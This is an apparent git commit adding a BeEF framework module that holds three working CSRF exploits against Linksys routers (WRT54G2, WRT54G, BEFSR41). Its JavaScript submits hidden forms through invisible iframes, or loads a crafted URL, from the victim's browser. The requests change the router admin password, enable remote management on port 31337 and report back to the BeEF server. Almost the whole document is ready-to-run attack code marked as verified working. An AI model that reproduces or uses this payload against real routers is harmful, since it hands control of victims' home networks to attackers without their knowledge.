Linksys CSRF module summited by Martin Barbella committed. It contains 3 CSRF exploits.

git-svn-id: https://beef.googlecode.com/svn/trunk@622 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9

modules/commands/network/linksys_csrf/linksys_csrf.js

@@ -0,0 +1,193 @@
+function pwn_wrt54g2() {
+  var port = '<%= @port %>';
+  var gateway = '<%= @base %>'; 
+  var passwd = '<%= @password %>';
+
+  var target = gateway + "Manage.tri";
+
+  var iframe = beef.dom.createInvisibleIframe();
+
+  var form = document.createElement('form');
+  form.setAttribute('action', target);
+  form.setAttribute('method', 'post');
+
+  var input = null;
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'MANAGE_USE_HTTP');
+  input.setAttribute('value', 0);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'MANAGE_HTTP');
+  input.setAttribute('value', 1);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'MANAGE_HTTP_S');
+  input.setAttribute('value', 0);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'MANAGE_PASSWORDMOD');
+  input.setAttribute('value', 1);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'MANAGE_PASSWORD');
+  input.setAttribute('value', passwd);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'MANAGE_PASSWORD_CONFIRM');
+  input.setAttribute('value', passwd);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', '_http_enable');
+  input.setAttribute('value', 1);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'MANAGE_WLFILTER');
+  input.setAttribute('value', 1);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'MANAGE_REMOTE');
+  input.setAttribute('value', 1);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'MANAGE_PORT');
+  input.setAttribute('value', port);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'MANAGE_UPNP');
+  input.setAttribute('value', 1);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'layout');
+  input.setAttribute('value', 'en');
+  form.appendChild(input);
+
+  iframe.contentWindow.document.body.appendChild(form);
+  form.submit();
+}
+
+function pwn_wrt54g() {
+  var port = '<%= @port %>';
+  var gateway = '<%= @base %>'; 
+  var passwd = '<%= @password %>';
+
+  var target = gateway + "manage.tri";
+
+  var iframe = beef.dom.createInvisibleIframe();
+
+  var form = document.createElement('form');
+  form.setAttribute('action', target);
+  form.setAttribute('method', 'post');
+
+  var input = null;
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'remote_mgt_https');
+  input.setAttribute('value', 0);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'http_enable');
+  input.setAttribute('value', 1);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'https_enable');
+  input.setAttribute('value', 0);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'PasswdModify');
+  input.setAttribute('value', 1);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'http_passwd');
+  input.setAttribute('value', passwd);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'http_passwdConfirm');
+  input.setAttribute('value', passwd);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', '_http_enable');
+  input.setAttribute('value', 1);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'web_wl_filter');
+  input.setAttribute('value', 1);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'remote_management');
+  input.setAttribute('value', 1);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'http_wanport');
+  input.setAttribute('value', port);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'upnp_enable');
+  input.setAttribute('value', 1);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'layout');
+  input.setAttribute('value', 'en');
+  form.appendChild(input);
+
+  iframe.contentWindow.document.body.appendChild(form);
+  form.submit();
+}
+
+function pwn_befsr41() {
+  var iframe = beef.dom.createInvisibleIframe();
+  iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0');
+}
+
+beef.execute(function() {
+  pwn_wrt54g2();
+  pwn_wrt54g();
+  pwn_befsr41();
+  beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+});

modules/commands/network/linksys_csrf/linksys_csrf.rb

@@ -0,0 +1,38 @@
+module BeEF
+module Modules
+module Commands
+
+
+class Linksys_csrf < BeEF::Command
+  
+  #
+  # Defines and set up the command module.
+  #
+  def initialize
+    super({
+      'Name' => 'Linksys CSRF Exploit',
+      'Description' => 'Attempts to enable remote administration and change the password on a linksys router.',
+      'Category' => 'Network',
+      'Author' => 'Martin Barbella',
+      'Data' => [['name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'], ['name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'], ['name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__']],
+      'File' => __FILE__
+    })
+
+    set_target({
+      'verified_status' =>  VERIFIED_WORKING, 
+      'browser_name' =>     ALL
+    })
+    
+    use_template!
+  end
+  
+  
+  def callback
+    save({'result' => @datastore['result']})
+  end
+  
+end
+
+end
+end
+end